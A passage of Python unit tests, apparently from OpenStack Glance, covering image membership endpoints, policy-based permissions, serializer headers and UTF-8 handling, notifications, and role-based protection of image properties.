\'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 401)\n\n def test_add_member_non_existing_image(self):\n """"""\n Tests adding image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n test_uri = \'/images/%s/members/pattieblack\'\n req = webob.Request.blank(test_uri % _gen_uuid())\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_add_member_positive(self):\n """"""\n Tests adding image members\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n def test_add_member_with_body(self):\n """"""\n Tests adding image members\n """"""\n fixture = dict(can_share=True)\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n req.body = json.dumps(dict(member=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n def test_add_member_forbidden_by_policy(self):\n rules = {""modify_member"": \'!\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID1)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n def test_add_member_allowed_by_policy(self):\n rules = {""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID1)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n\n def test_get_members_of_deleted_image_raises_404(self):\n """"""\n Tests members listing for deleted image raises 404.\n """"""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_delete_member_of_deleted_image_raises_404(self):\n """"""\n Tests deleting members of deleted image raises 404.\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'DELETE\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_update_members_of_deleted_image_raises_404(self):\n """"""\n Tests update members of deleted image raises 404.\n """"""\n test_router = 
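A recurring pattern in the member tests is `set_policy_rules({...})` with `'!'` to deny an action to everyone (the 403 cases) and `'@'` to allow it to everyone (the 200/204 cases). A stripped-down sketch of those two rule semantics; this mirrors the behaviour the tests rely on, not the actual glance/oslo policy engine:

```python
class ToyPolicy(object):
    """'!' denies all, '@' allows all; unknown actions default to allow."""

    def __init__(self, rules):
        self.rules = rules

    def is_allowed(self, action):
        return self.rules.get(action, '@') != '!'

policy = ToyPolicy({'modify_member': '!', 'get_members': '@'})
assert not policy.is_allowed('modify_member')   # -> HTTPForbidden above
assert policy.is_allowed('get_members')         # -> 200/204 above
```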
router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n fixture = [{\'member_id\': \'pattieblack\', \'can_share\': \'false\'}]\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_create_member_to_deleted_image_raises_404(self):\n """"""\n Tests adding members to deleted image raises 404.\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_delete_member(self):\n """"""\n Tests deleting image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=False)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'DELETE\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 401)\n\n def test_delete_member_on_non_existing_image(self):\n """"""\n Tests deleting image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n test_uri = \'/images/%s/members/pattieblack\'\n req = webob.Request.blank(test_uri % _gen_uuid())\n req.method = \'DELETE\'\n\n res = req.get_response(api)\n self.assertEquals(res.status_int, 404)\n\n def test_delete_non_exist_member(self):\n """"""\n Test deleting image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/test_user\' % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(api)\n self.assertEquals(res.status_int, 404)\n\n def test_delete_image_member(self):\n test_rserver = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_rserver, is_admin=True)\n\n # Add member to image:\n fixture = dict(can_share=True)\n test_uri = \'/images/%s/members/test_add_member_positive\'\n req = webob.Request.blank(test_uri % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(member=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n # Delete member\n test_uri = \'/images/%s/members/test_add_member_positive\'\n req = webob.Request.blank(test_uri % UUID2)\n req.headers[\'X-Auth-Token\'] = \'test1:test1:\'\n req.method = \'DELETE\'\n req.content_type = \'application/json\'\n res = 
req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n self.assertTrue(\'Forbidden\' in res.body)\n\n def test_delete_member_allowed_by_policy(self):\n rules = {""delete_member"": \'@\', ""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n\n def test_delete_member_forbidden_by_policy(self):\n rules = {""delete_member"": \'!\', ""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n\nclass TestImageSerializer(base.IsolatedUnitTest):\n def setUp(self):\n """"""Establish a clean test environment""""""\n super(TestImageSerializer, self).setUp()\n self.receiving_user = \'fake_user\'\n self.receiving_tenant = 2\n self.context = glance.context.RequestContext(\n is_admin=True,\n user=self.receiving_user,\n tenant=self.receiving_tenant)\n self.serializer = images.ImageSerializer()\n\n def image_iter():\n for x in [\'chunk\', \'678911234\', \'56789\']:\n yield x\n\n self.FIXTURE = {\n \'image_iterator\': image_iter(),\n \'image_meta\': {\n \'id\': UUID2,\n \'name\': \'fake image #2\',\n \'status\': \'active\',\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'is_public\': True,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': \'PI:KEY\',\n \'size\': 19,\n \'owner\': _gen_uuid(),\n \'location\': ""file:///tmp/glance-tests/2"",\n \'properties\': {},\n }\n }\n\n def test_meta(self):\n exp_headers = {\'x-image-meta-id\': UUID2,\n \'x-image-meta-location\': \'file:///tmp/glance-tests/2\',\n \'ETag\': self.FIXTURE[\'image_meta\'][\'checksum\'],\n \'x-image-meta-name\': \'fake image #2\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n req.remote_addr = ""127.0.0.1""\n req.context = self.context\n response = webob.Response(request=req)\n self.serializer.meta(response, self.FIXTURE)\n for key, value in exp_headers.iteritems():\n self.assertEquals(value, response.headers[key])\n\n def test_meta_utf8(self):\n # We get unicode strings from JSON, and therefore all strings in the\n # metadata will actually be unicode when handled internally. 
But we\n # want to output utf-8.\n FIXTURE = {\n \'image_meta\': {\n \'id\': unicode(UUID2),\n \'name\': u\'fake image #2 with utf-8 éàè\',\n \'status\': u\'active\',\n \'disk_format\': u\'vhd\',\n \'container_format\': u\'ovf\',\n \'is_public\': True,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': u\'PI:KEY\',\n \'size\': 19,\n \'owner\': unicode(_gen_uuid()),\n \'location\': u""file:///tmp/glance-tests/2"",\n \'properties\': {\n u\'prop_éé\': u\'ça marche\',\n u\'prop_çé\': u\'çé\',\n }\n }\n }\n exp_headers = {\'x-image-meta-id\': UUID2.encode(\'utf-8\'),\n \'x-image-meta-location\': \'file:///tmp/glance-tests/2\',\n \'ETag\': \'PI:KEY\',\n \'x-image-meta-size\': \'19\', # str, not int\n \'x-image-meta-name\': \'fake image #2 with utf-8 éàè\',\n \'x-image-meta-property-prop_éé\': \'ça marche\',\n \'x-image-meta-property-prop_çé\': u\'çé\'.encode(\'utf-8\')}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n req.remote_addr = ""127.0.0.1""\n req.context = self.context\n response = webob.Response(request=req)\n self.serializer.meta(response, FIXTURE)\n self.assertNotEqual(type(FIXTURE[\'image_meta\'][\'name\']),\n type(response.headers[\'x-image-meta-name\']))\n self.assertEqual(response.headers[\'x-image-meta-name\'].decode(\'utf-8\'),\n FIXTURE[\'image_meta\'][\'name\'])\n for key, value in exp_headers.iteritems():\n self.assertEquals(value, response.headers[key])\n\n FIXTURE[\'image_meta\'][\'properties\'][u\'prop_bad\'] = \'çé\'\n self.assertRaises(UnicodeDecodeError,\n self.serializer.meta, response, FIXTURE)\n\n def test_show(self):\n exp_headers = {\'x-image-meta-id\': UUID2,\n \'x-image-meta-location\': \'file:///tmp/glance-tests/2\',\n \'ETag\': self.FIXTURE[\'image_meta\'][\'checksum\'],\n \'x-image-meta-name\': \'fake image #2\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.context = self.context\n response = webob.Response(request=req)\n self.serializer.show(response, self.FIXTURE)\n for key, value in exp_headers.iteritems():\n self.assertEquals(value, response.headers[key])\n\n self.assertEqual(response.body, \'chunk67891123456789\')\n\n def test_show_notify(self):\n """"""Make sure an eventlet posthook for notify_image_sent is added.""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.context = self.context\n response = webob.Response(request=req)\n response.request.environ[\'eventlet.posthooks\'] = []\n\n self.serializer.show(response, self.FIXTURE)\n\n #just make sure the app_iter is called\n for chunk in response.app_iter:\n pass\n\n self.assertNotEqual(response.request.environ[\'eventlet.posthooks\'], [])\n\n def test_image_send_notification(self):\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.remote_addr = \'127.0.0.1\'\n req.context = self.context\n\n image_meta = self.FIXTURE[\'image_meta\']\n called = {""notified"": False}\n expected_payload = {\n \'bytes_sent\': 19,\n \'image_id\': UUID2,\n \'owner_id\': image_meta[\'owner\'],\n \'receiver_tenant_id\': self.receiving_tenant,\n \'receiver_user_id\': self.receiving_user,\n \'destination_ip\': \'127.0.0.1\',\n }\n\n def fake_info(_event_type, _payload):\n self.assertEqual(_payload, expected_payload)\n called[\'notified\'] = True\n\n self.stubs.Set(self.serializer.notifier, \'info\', fake_info)\n\n glance.api.common.image_send_notification(19, 19, image_meta, req,\n self.serializer.notifier)\n\n 
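test_meta_utf8 fixes the serializer contract: values arrive as unicode (that is what JSON decoding yields) and must leave as UTF-8 byte strings in the response headers, while a property value that is already a non-ASCII byte string is rejected. Under Python 2, which this suite targets, calling `.encode('utf-8')` on a *byte* string performs an implicit ASCII decode first, which is exactly why the final `assertRaises` sees a UnicodeDecodeError. A short illustration of that asymmetry (Python 2 semantics):

```python
# -*- coding: utf-8 -*-
value = u'fake image #2 with utf-8 éàè'
header = value.encode('utf-8')        # unicode -> UTF-8 bytes: fine

raw = '\xc3\xa7\xc3\xa9'              # already a byte string ('çé')
try:
    raw.encode('utf-8')               # implicit ASCII decode happens first
except UnicodeDecodeError:
    pass                              # the assertRaises case in the test
```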
self.assertTrue(called[\'notified\'])\n\n def test_image_send_notification_error(self):\n """"""Ensure image.send notification is sent on error.""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.remote_addr = \'127.0.0.1\'\n req.context = self.context\n\n image_meta = self.FIXTURE[\'image_meta\']\n called = {""notified"": False}\n expected_payload = {\n \'bytes_sent\': 17,\n \'image_id\': UUID2,\n \'owner_id\': image_meta[\'owner\'],\n \'receiver_tenant_id\': self.receiving_tenant,\n \'receiver_user_id\': self.receiving_user,\n \'destination_ip\': \'127.0.0.1\',\n }\n\n def fake_error(_event_type, _payload):\n self.assertEqual(_payload, expected_payload)\n called[\'notified\'] = True\n\n self.stubs.Set(self.serializer.notifier, \'error\', fake_error)\n\n #expected and actually sent bytes differ\n glance.api.common.image_send_notification(17, 19, image_meta, req,\n self.serializer.notifier)\n\n self.assertTrue(called[\'notified\'])\n\n def test_redact_location(self):\n """"""Ensure location redaction does not change original metadata""""""\n image_meta = {\'size\': 3, \'id\': \'123\', \'location\': \'http://localhost\'}\n redacted_image_meta = {\'size\': 3, \'id\': \'123\'}\n copy_image_meta = copy.deepcopy(image_meta)\n tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)\n\n self.assertEqual(image_meta, copy_image_meta)\n self.assertEqual(tmp_image_meta, redacted_image_meta)\n\n def test_noop_redact_location(self):\n """"""Check no-op location redaction does not change original metadata""""""\n image_meta = {\'size\': 3, \'id\': \'123\'}\n redacted_image_meta = {\'size\': 3, \'id\': \'123\'}\n copy_image_meta = copy.deepcopy(image_meta)\n tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)\n\n self.assertEqual(image_meta, copy_image_meta)\n self.assertEqual(tmp_image_meta, redacted_image_meta)\n self.assertEqual(image_meta, redacted_image_meta)\n\n\nclass TestFilterValidator(base.IsolatedUnitTest):\n def test_filter_validator(self):\n self.assertFalse(glance.api.v1.filters.validate(\'size_max\', -1))\n self.assertTrue(glance.api.v1.filters.validate(\'size_max\', 1))\n self.assertTrue(glance.api.v1.filters.validate(\'protected\', \'True\'))\n self.assertTrue(glance.api.v1.filters.validate(\'protected\', \'FALSE\'))\n self.assertFalse(glance.api.v1.filters.validate(\'protected\', \'-1\'))\n\n\nclass TestAPIProtectedProps(base.IsolatedUnitTest):\n def setUp(self):\n """"""Establish a clean test environment""""""\n super(TestAPIProtectedProps, self).setUp()\n self.mapper = routes.Mapper()\n # turn on property protections\n self.set_property_protections()\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))\n db_api.setup_db_env()\n db_api.get_engine()\n db_models.unregister_models(db_api._ENGINE)\n db_models.register_models(db_api._ENGINE)\n\n def tearDown(self):\n """"""Clear the test environment""""""\n super(TestAPIProtectedProps, self).tearDown()\n self.destroy_fixtures()\n\n def destroy_fixtures(self):\n # Easiest to just drop the models and re-create them...\n db_models.unregister_models(db_api._ENGINE)\n db_models.register_models(db_api._ENGINE)\n\n def _create_admin_image(self, props={}):\n request = unit_test_utils.get_fake_request(path=\'/images\')\n headers = {\'x-image-meta-disk-format\': \'ami\',\n \'x-image-meta-container-format\': \'ami\',\n \'x-image-meta-name\': \'foo\',\n \'x-image-meta-size\': \'0\',\n \'x-auth-token\': \'user:tenant:admin\'}\n headers.update(props)\n for k, v in headers.iteritems():\n 
request.headers[k] = v\n created_image = request.get_response(self.api)\n res_body = json.loads(created_image.body)[\'image\']\n image_id = res_body[\'id\']\n return image_id\n\n def test_prop_protection_with_create_and_permitted_role(self):\n """"""\n As admin role, create an image and verify permitted role \'member\' can\n create a protected property\n """"""\n image_id = self._create_admin_image()\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'bar\')\n\n def test_prop_protection_with_create_and_unpermitted_role(self):\n """"""\n As admin role, create an image and verify unpermitted role\n \'fake_member\' can *not* create a protected property\n """"""\n image_id = self._create_admin_image()\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:fake_member\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n another_request.get_response(self.api)\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)\n self.assertIn(""Property \'%s\' is protected"" %\n ""x_owner_foo"", output.body)\n\n def test_prop_protection_with_show_and_permitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'member\' can read that protected property via HEAD\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:member\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n res2 = another_request.get_response(self.api)\n self.assertEqual(res2.headers[\'x-image-meta-property-x_owner_foo\'],\n \'bar\')\n\n def test_prop_protection_with_show_and_unpermitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n unpermitted role \'fake_role\' can *not* read that protected property via\n HEAD\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:fake_role\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\', output.headers)\n\n def test_prop_protection_with_get_and_permitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'member\' can read that protected property via GET\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:member\'}\n for k, v in 
headers.iteritems():\n another_request.headers[k] = v\n res2 = another_request.get_response(self.api)\n self.assertEqual(res2.headers[\'x-image-meta-property-x_owner_foo\'],\n \'bar\')\n\n def test_prop_protection_with_get_and_unpermitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n unpermitted role \'fake_role\' can *not* read that protected property via\n GET\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:fake_role\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\', output.headers)\n\n def test_prop_protection_with_detail_and_permitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'member\' can read that protected property via\n /images/detail\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/detail\')\n headers = {\'x-auth-token\': \'user:tenant:member\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n res_body = json.loads(output.body)[\'images\'][0]\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'bar\')\n\n def test_prop_protection_with_detail_and_unpermitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n unpermitted role \'fake_role\' can *not* read that protected property via\n /images/detail\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/detail\')\n headers = {\'x-auth-token\': \'user:tenant:fake_role\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n res_body = json.loads(output.body)[\'images\'][0]\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\',\n res_body[\'properties\'])\n\n def test_prop_protection_with_update_and_permitted_role(self):\n """"""\n As admin role, create an image with protected property, and verify\n permitted role \'member\' can update that protected property\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'x-image-meta-property-x_owner_foo\': \'baz\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'baz\')\n\n def test_prop_protection_with_update_and_unpermitted_role(self):\n """"""\n As admin role, create an image with protected property, and verify\n unpermitted role \'fake_role\' can *not* update that protected property\n """"""\n image_id = self._create_admin_image(\n 
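All of the protected-property tests derive from one rule table, loaded by `set_property_protections()` in setUp: each property maps the roles that may create, read, update, or delete it. The fixture file itself is not shown here, so the table below is reconstructed from the assertions (a hypothetical mirror, not the actual config):

```python
# Hypothetical rule table inferred from the assertions in these tests.
PROPERTY_RULES = {
    'x_owner_foo':          {'create': {'member'}, 'read': {'member'},
                             'update': {'member'}, 'delete': {'member'}},
    'spl_read_prop':        {'read': {'spl_role'}},
    'spl_read_only_prop':   {'read': {'spl_role'}},
    'spl_update_prop':      {'read': {'spl_role'}, 'update': {'spl_role'}},
    'spl_update_only_prop': {'update': {'spl_role'}},
    'spl_delete_prop':      {'read': {'spl_role'}, 'delete': {'spl_role'}},
    'admin_foo':            {'read': {'admin'}, 'update': {'admin'},
                             'delete': {'admin'}},
}

def allowed(prop, op, role):
    return role in PROPERTY_RULES.get(prop, {}).get(op, set())

assert allowed('x_owner_foo', 'update', 'member')        # the 200 cases
assert not allowed('x_owner_foo', 'read', 'fake_role')   # hidden property
assert not allowed('spl_update_only_prop', 'read', 'spl_role')
```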
{\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:fake_role\',\n \'x-image-meta-property-x_owner_foo\': \'baz\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)\n self.assertIn(""Property \'%s\' is protected"" %\n ""x_owner_foo"", output.body)\n\n def test_prop_protection_update_without_read(self):\n """"""\n Test protected property cannot be updated without read permission\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_update_only_prop\': \'foo\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_update_only_prop\': \'bar\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)\n self.assertIn(""Property \'%s\' is protected"" %\n ""spl_update_only_prop"", output.body)\n\n def test_prop_protection_update_noop(self):\n """"""\n Test protected property update is allowed as long as the user has read\n access and the value is unchanged\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_read_prop\': \'foo\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_read_prop\': \'foo\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'spl_read_prop\'], \'foo\')\n self.assertEquals(output.status_int, 200)\n\n def test_prop_protection_with_delete_and_permitted_role(self):\n """"""\n As admin role, create an image with protected property, and verify\n permitted role \'member\' can delete that protected property\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'], {})\n\n def test_prop_protection_with_delete_and_unpermitted_read(self):\n """"""\n Test protected property cannot be deleted without read permission\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:fake_role\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, 200)\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\', output.headers)\n\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', 
path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:admin\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertEqual(output.headers[\'x-image-meta-property-x_owner_foo\'],\n \'bar\')\n\n def test_prop_protection_with_delete_and_unpermitted_delete(self):\n """"""\n Test protected property cannot be deleted without delete permission\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_update_prop\': \'foo\'})\n\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, 403)\n self.assertIn(""Property \'%s\' is protected"" %\n ""spl_update_prop"", output.body)\n\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:admin\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertEqual(\n output.headers[\'x-image-meta-property-spl_update_prop\'], \'foo\')\n\n def test_read_protected_props_leak_with_update(self):\n """"""\n Verify when updating props that ones we don\'t have read permission for\n are not disclosed\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-spl_update_prop\': \'0\',\n \'x-image-meta-property-foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_update_prop\': \'1\',\n \'X-Glance-Registry-Purge-Props\': \'False\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n 